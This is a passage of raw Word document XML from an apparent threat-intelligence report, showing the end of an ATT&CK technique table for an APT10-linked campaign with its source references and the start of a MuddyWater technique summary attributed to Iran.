            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7EAF7C" w14:textId="77777777" w:rsidR="0027472D" w:rsidRPr="00B857D7" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="431EE796" w14:textId="762AE97C" w:rsidR="0027472D" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13A74088" w14:textId="674C3DB2" w:rsidR="0027472D" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12636F7C" w14:textId="08347D6C" w:rsidR="0027472D" w:rsidRPr="008D6D8A" w:rsidRDefault="0027472D" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C17AF" w:rsidRPr="00A44889" w14:paraId="330BDD3F" w14:textId="77777777" w:rsidTr="00021B7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="529E9809" w14:textId="79B18402" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="293B8124" w14:textId="77777777" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD5FCD2" w14:textId="77777777" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C436CD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E50EDB7" w14:textId="7DC5EBED" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71BC4ED5" w14:textId="77777777" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60293AE9" w14:textId="77777777" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C5EE76" w14:textId="77777777" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C59FB56" w14:textId="77777777" w:rsidR="009C17AF" w:rsidRPr="00A44889" w:rsidRDefault="009C17AF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Its communication can either happen via a raw TCP socket or a HTTP POST request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA7544" w:rsidRPr="001E116F" w14:paraId="174A5CBF" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3909ACE4" w14:textId="3AEBA56A" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433A8251" w14:textId="66F4C405" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E116F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001E116F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001E116F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A62EF3" w14:textId="2A389701" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E116F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001E116F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E116F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2063EBBB" w14:textId="70E88BE4" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34573B67" w14:textId="77777777" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="00DA7544" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118EA96D" w14:textId="244BA40A" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29066742" w14:textId="22A19C1B" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75B40C57" w14:textId="60001E0F" w:rsidR="00DA7544" w:rsidRPr="001E116F" w:rsidRDefault="00255124" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00255124">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In 2019, we observed an APT campaign targeting multiple industries, including the Japanese manufacturing industry and its overseas operations, that was designed to steal informatio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E116F" w:rsidRPr="00B857D7" w14:paraId="7368AE1F" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21521D45" w14:textId="77777777" w:rsidR="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6639ABAB" w14:textId="77777777" w:rsidR="001E116F" w:rsidRPr="00E610D9" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7BA386" w14:textId="77777777" w:rsidR="001E116F" w:rsidRPr="00E610D9" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B3D34CF" w14:textId="77777777" w:rsidR="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="161F969C" w14:textId="77777777" w:rsidR="001E116F" w:rsidRPr="00B857D7" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E194FE" w14:textId="77777777" w:rsidR="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1DC88F" w14:textId="77777777" w:rsidR="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA4128E" w14:textId="77777777" w:rsidR="001E116F" w:rsidRDefault="001E116F" w:rsidP="0027472D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72B52E16" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="0077286F" w:rsidRDefault="006152F1" w:rsidP="006152F1"/>
    <w:p w14:paraId="1F73D83E" w14:textId="6BCA2FC5" w:rsidR="006152F1" w:rsidRPr="004029BD" w:rsidRDefault="006152F1" w:rsidP="006152F1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId143" w:history="1">
        <w:r w:rsidR="00B74865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">APT10: sophisticated multi-layered loader </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B74865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Ecipekac</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B74865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> discovered in A41APT campaign | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B74865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Securelist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="00B74865">
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CD246" w14:textId="77777777" w:rsidR="009C64BB" w:rsidRDefault="005A06B8">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Attacks Exploiting Vulnerabilities in Pulse Connect Secure - JPCERT/CC Eyes | JPCERT Coordination </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Center</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> official Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] (via [1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD4172" w14:textId="77777777" w:rsidR="00F42A95" w:rsidRDefault="009C64BB">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId145" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>APT10: Tracking down the stealth activity of the A41APT campaign (kasperskydaily.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021] ( via [1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C4922B" w14:textId="77777777" w:rsidR="008B7D5D" w:rsidRDefault="00F42A95">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>P8RAT, Software S0626 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E0E0C7F" w14:textId="1485041F" w:rsidR="00292FA1" w:rsidRDefault="008B7D5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId147" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SodaMaster</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (Malware Family) (fraunhofer.de)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00292FA1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED84F59" w14:textId="4E89062D" w:rsidR="00292FA1" w:rsidRDefault="00292FA1" w:rsidP="00292FA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc153480889"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MuddyWater</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B68CA4C" w14:textId="77777777" w:rsidR="00292FA1" w:rsidRPr="005B4630" w:rsidRDefault="00292FA1" w:rsidP="00292FA1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc153480890"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="0E799629" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="009E1AF2" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0069 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MuddyWater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69826EB8" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="009E1AF2" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Iran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE8227" w14:textId="77777777" w:rsidR="009E1AF2" w:rsidRPr="009E1AF2" w:rsidRDefault="009E1AF2" w:rsidP="009E1AF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is IR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233EEEE"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1589.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61F55C"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T1589.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Identity Information&gt;:Email Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020E762F"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002', 'T1583.006']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD89F8B"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D99BA"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T1583.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E1AF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
